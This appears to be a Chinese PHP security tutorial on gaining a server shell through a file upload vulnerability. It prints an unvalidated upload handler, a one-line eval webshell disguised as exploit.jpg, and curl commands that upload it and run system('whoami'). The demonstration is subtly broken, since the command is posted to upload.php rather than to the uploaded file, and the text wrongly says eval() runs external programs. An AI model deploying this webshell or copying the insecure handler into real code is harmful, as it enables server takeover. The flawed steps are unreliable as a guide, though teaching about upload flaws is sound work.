php中eval和system的细节使用（配合文件上传漏洞）

在PHP中，eval()函数和system()函数都可以执行外部程序。eval()函数可以执行一段以字符串形式给出的PHP代码。而system()函数可以执行一个外部程序，并且将结果输出。

这里我们使用eval()和system()来演示如何利用文件上传漏洞来获取服务器的shell。

首先，我们需要一个可以上传文件的表单：

<form action="upload.php" method="post" enctype="multipart/form-data">
    Select image to upload:
    <input type="file" name="fileToUpload" id="fileToUpload">
    <input type="submit" value="Upload Image" name="submit">
</form>

然后是upload.php文件：

<?php
$target_dir = "uploads/";
$target_file = $target_dir . basename($_FILES["fileToUpload"]["name"]);
 
if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) {
    echo "The file ". htmlspecialchars( basename( $_FILES["fileToUpload"]["name"])). " has been uploaded.";
} else {
    echo "Sorry, there was an error uploading your file.";
}
?>

如果上传的文件是一个PHP脚本，那么它将被执行。但如果服务器配置不当，可能会允许上传包含恶意代码的文件。例如，我们可以上传一个名为exploit.jpg的文件，内容如下：

<?php
    eval($_POST['cmd']);
?>

当上传成功后，我们可以使用以下代码来执行系统命令：

curl -F "file=@exploit.jpg" http://example.com/upload.php
curl -F "cmd=system('whoami');" http://example.com/upload.php

第一个curl命令上传了一个包含恶意代码的文件。第二个curl命令通过eval()函数执行，并使用system()函数执行命令whoami，这将输出当前的用户名。

注意：这种方法依赖于服务器配置错误，实际上很少有服务器会这么配置，所以这只是一个教学示例。在实际环境中，应该通过编程手段避免文件上传漏洞，例如通过对上传的文件进行重命名、限制文件类型、设置文件权限等方式来增强安全性。